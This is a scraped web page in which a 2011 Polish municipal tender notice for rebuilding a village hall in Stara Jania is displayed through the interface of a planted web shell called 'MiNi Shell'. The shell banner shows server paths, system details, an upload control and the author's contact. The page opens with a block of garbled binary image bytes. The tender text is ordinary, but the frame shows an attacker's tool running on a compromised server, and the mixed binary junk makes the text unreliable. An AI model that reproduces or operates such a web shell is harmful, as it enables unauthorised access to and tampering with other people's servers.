JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/124424-N-2011.html

<p class="kh_header"><b>Smętowo Graniczne: Adaptacja budynku na Centrum Rekreacyjno - Wypoczynkowe w miejscowości Stara Jania .</b><br>
<b>Numer ogłoszenia: 124424 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smętowo Graniczne , ul. Dworcowa 10, 83-230 Smętowo Graniczne, woj. pomorskie, tel. 058 5619033, faks 058 5619520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.smetowograniczne.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku na Centrum Rekreacyjno - Wypoczynkowe w miejscowości Stara Jania ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest inwestycja realizowana w miejscowości Stara Jania na działkach 125/1 i 126/1 , obręb ewidencyjny Kościelna Jania. 
Zakres zamówienia obejmuje kompleksową realizację robót budowlanych, instalacyjnych (sanitarnych i elektrycznych), wykonanych w całości zgodnie z dokumentacją projektową: projekt budowlany; Przebudowa i zmiana sposobu użytkowania ist. budynku świetlicy wiejskiej na potrzeby centrum rekreacyjno-wypoczynkowego.  
Opis prac remontowych:
-wymiana podłogi,
-wymiana pokrycia dachu z eternitu na blachodachówkę,
- wymiana sufitu podwieszonego z boazerii drewnianej na płytę gipsową,
- docieplenie ścian zewnętrznych, 
-demontaż starych pieców kaflowych, 
- wydzielenie pomieszczenia sanitarnego WC zabierając część pomieszczenia garażowego,
- wymiana stolarki okiennej i drzwiowej,
- wymiana istniejących instalacji elektrycznych i sanitarnych na nowe.

 Zakres robót budowlanych:
1.1	Roboty murarskie; rozebranie pieców kaflowych, wykucie z muru parapetów, wykucie otworów w ścianach z cegieł dla otworów okiennych i drzwiowych, wykucie gniazd dla nadproży ułożenie nadproży, wykonanie wykopów wewnątrz , wykonanie ław fundamentowych wewnątrz budynku, wykonanie ścian, przemurowanie kominów ponad dachem, odbicie tynków wewnętrznych wraz z okładzinami, uzupełnienie tynków wewnętrznych, wykonanie tynków wewnętrznych na wybudowanych ścianach.
1.2	Roboty malarskie i okładzinowe; zeskrobanie i zmycie starej farby, wykonanie gładzi gipsowych na ścianach i sufitach, malowanie farbą powierzchni wewnętrznych, licowanie ścian płytkami o wymiarach 20x20cm,  rozebranie elementów stropów drewnianych-podsufitki, okładziny stropów płytami gipsowo-kartonowymi na ruszcie metalowym podwieszanym, malowanie płyt gipsowo-kartonowych spoinowanych szpachlowanych z gruntowaniem.
1.3	Roboty przy posadzkach; rozebranie podłóg białych, usunięcie ziemi, wykonanie podkładów betonowych, wykonanie izolacji przeciwwilgociowych, wykonanie izolacji cieplnych i przeciwdźwiękowych, wykonanie podłogi z desek, lakierowanie podłogi drewnianej, wykonanie podkładów betonowych pod posadzki z płytek, wykonanie izolacji przeciwwilgociowych, przeciwwodnych, cieplnych i przeciwdźwiękowych, wyłożenie posadzki płytkami o wymiarach 30x30cm.
1.4	Wykonanie elewacji-roboty zewnętrzne : roboty ziemne, wykonanie izolacji przeciwwilgociowych-cokół, docieplenie cokołu styropianem, przygotowanie starego podłoża pod docieplenie ścian metoda lekką-mokra, ocieplenie ścian budynku płytami styropianowymi, docieplenie ościeży płytami styropianowymi, malowanie tynków zewnętrznych farbą silikonową, wykonanie tynku cienkowarstwowego mozaikowego na cokole budynku, wykonanie izolacji pionowych ścian fundamentowych z folii kubełkowej.
1.5	Stolarka otworowa; wykonanie stolarki okiennej i drzwiowej: 8 sztuk okien drewnianych na okna  z PCV,  wymiana okienka podawczego, obsadzenie podokienników, wykonanie parapetów zewnętrznych z blachy powlekanej, montaż drzwi drewnianych malowanych do starych sanitariatów,  montaż drzwi PCV dwuskrzydłowych  -ciepłe oszklone na budowie,(2 zamki, szyba bezpieczna, samozamykacz), montaż kurtyny powietrznej, montaż drzwi drewnianych dwuskrzydłowych z ościeżnicami, obite klepką (bramy drewniane)..
1.6	Pokrycie dachowe; rozebranie pokrycia z płyt i gąsiorów  azbestowo-cementowych, rozebranie więźb dachowych, izolacje z folii polietylenowej, izolacje cieplne i przeciwdźwiękowe z wełny mineralnej, folie wstępnego krycia, ołacenie połaci dachowych łatami, rozebranie obróbek murów ogniowych, okapów, kołnierzy , gzymsów itp., rozebranie rynien i rur spustowych, wykonanie obróbek blacharskich z blachy powlekanej, montaż rynien i rur spustowych wykonanych z blachy stalowej ocynkowanej powlekanej, pokrycie dachu blachodachówką  powlekaną z elementami wykończeniowymi-gąsiory z blachy powlekanej.
1.7	Wywóz gruzu; wywiezienie gruzu z rozbieranych konstrukcji. 

Zakres robót sanitarnych;

1.8	Instalacja wodociągowa; demontaż rurociągu stalowego z bateriami, wykucie bruzd dla schowania rur w murze, wykonanie rurociągów z tworzyw sztucznych, montaż elektrycznych przepływowych ogrzewaczy wody, płukanie instalacji wodociągowej, próby szczelności instalacji wodociągowej.
1.9	Instalacja kanalizacyjna; demontaż urządzeń sanitarnych, wykopy i kanały rurowe, układanie rurociągów z PVC, instalowanie rur wywiewnych, montaż zlewozmywaka,  umywalek i ustępów.
1.10	Ogrzewanie; dostawa i montaż pieców akumulacyjnych.


Zakres robót elektrycznych;

1.11	Demontaż instalacji elektryczne; demontaż przewodów, obudów, łączników, gniazd, opraw oświetleniowych itp., 
1.12	Montaż rozdzielni TR oraz instalacja gniazd wtykowych 1-fazowych; wykucie wnęki, przygotowanie podłoża, montaż skrzynki i osprzętu modułowego, wykucie bruzd i ułożenie rur i przewodów kabelkowych, montaż puszek podtynkowych, montaż gniazd i łączników.
1.13	Instalacja gniazd komputerowych; wykucie bruzd, ułożenie rur i przewodów kabelkowych, montaż puszek i gniazd instalacyjnych.
1.14	Montaż oświetlenia; wykucie bruzd, ułożenie rur i przewodów kabelkowych, montaż opraw oświetleniowych i modułu oświetlenia awaryjnego, montaż puszek i łączników.
1.15	Sprawdzenia i badania odbiorcze; pomiar rezystancji izolacji instalacji elektrycznej, pomiar skuteczności zerowania.
1.16	Roboty uzupełniające; wykonanie obwodu 3-fazowego,  podłączenie grzejników elektrycznych, pomiary obwodu 3-fazowego.

Szczegółowy opis przedmiotu zamówienia przedstawiony został w dokumentacji
projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych oraz w przedmiarach robót.

Wymagany okres gwarancji jakości na cały przedmiot zamówienia minimum 36 miesięcy, licząc od dnia odbioru końcowego robót przez Zamawiającego, bez zastrzeżeń.
2. W/w roboty budowlane należy wykonać z zachowaniem szczególnej staranności, zgodnie ze sztuką budowlaną, technologią systemową, zaleceniami nadzoru inwestorskiego oraz zgodnie z umową, dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót, przedmiarami robót, Polskimi Normami Budowlanymi, Specyfikacją Istotnych Warunków Zamówienia.
Wszystkie materiały i urządzenia niezbędne do wykonania zadania dostarcza Wykonawca.
Przy wykonywaniu robót Wykonawca zobowiązuje się stosować wyroby budowlane i urządzenia o właściwościach użytkowych umożliwiających prawidłowo zaprojektowanym i wykonanym obiektom budowlanym spełnienie wymagań podstawowych, określonych w art. 5 ust. 1 pkt 1 - dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (j.t. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm. ) i przepisami wykonawczymi.
Wszystkie materiały i urządzenia użyte do wykonania zamówienia muszą posiadać aktualne świadectwa, aprobaty lub certyfikaty dopuszczające do stosowania w budownictwie na terenie RP. Odpowiednie atesty, certyfikaty, gwarancje i aprobaty techniczne dotyczące zastosowanych materiałów i urządzeń należy przedłożyć inspektorowi nadzoru przed ich zastosowaniem.

Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i urządzeń nowych, w gatunku I, gwarantujących najwyższą jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji projektowej. Występujące w opracowaniach nazwy, typy i pochodzenie produktów nie są dla Wykonawców wiążące.
Nazwy własne nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego.
Wszystkie materiały i urządzenia równoważne w stosunku do dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót muszą być zgłoszone w ofercie wraz ze wszystkimi parametrami technicznymi.
Zobowiązuje się wykonawcę do sprawdzenia zgodności projektu budowlanego z przedmiarem robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 54.45.30.00-7, 45.00.00.00-7, 45.31.00.00-3, 45.33.24.00-7, 45.26.00.00-7, 45.44.21.10-1, 45.42.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca przedstawi oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności przy realizacji zamówienia, (załącznik nr 1 do oferty).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli Wykonawca wykaże (załącznik nr3 do oferty), że zrealizował okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 inwestycji polegających na budowie, przebudowie  budynków o wartości brutto co najmniej 150000,00zł każda wraz z instalacjami elektrycznymi i sanitarnymi z podaniem rodzaju robót, ich wartości, daty i miejsca wykonania oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje).
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli Wykonawca przedstawi oświadczenie (wg załącznika nr 1 do oferty), że dysponuje potencjałem technicznym umożliwiającym wykonanie zamówienia, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli Wykonawca przedstawi oświadczenie (wg załącznika nr 1 do oferty), że dysponuje osobami zdolnymi umożliwiającymi wykonanie zamówienia, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli Wykonawca przedstawi oświadczenie (wg załącznika nr 1 do oferty), że znajduje się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie robót zgodnie z przedmiotem zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek Wykonawcy mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">kosztorys ofertowy-uproszczony</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy-załącznik do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:
a)zmiana wynagrodzenia Wykonawcy za wykonanie zamówienia może nastąpić w wyniku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana ustawowej stawki podatku od towarów i usług;
b) termin wykonania umowy może ulec zmianie w przypadku wystąpienia sytuacji niemożliwych do przewidzenia w chwili zawarcia umowy, jak np.:
- konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
- z powodu nieprzewidzianego braku płynności finansowej u Zamawiającego,
- wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego,
- z powodu warunków atmosferycznych uniemożliwiających wykonywanie robót nieprzerwanie przez okres co najmniej 10 dni,
c) uzasadnionej konieczności zmiany osób pełniących samodzielne funkcje na budowie.
Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego - zawiera załącznik Nr 5</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.smetowograniczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Smętowie Granicznym, 83-230 Smętowo Graniczne, ul. Dworcowa 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 11:00, miejsce: Urząd Gminy w Smętowie Granicznym, 83-230 Smętowo Graniczne, ul. Dworcowa 10, sekretariat Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata  2007 - 2013.
Oś 3 ;Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com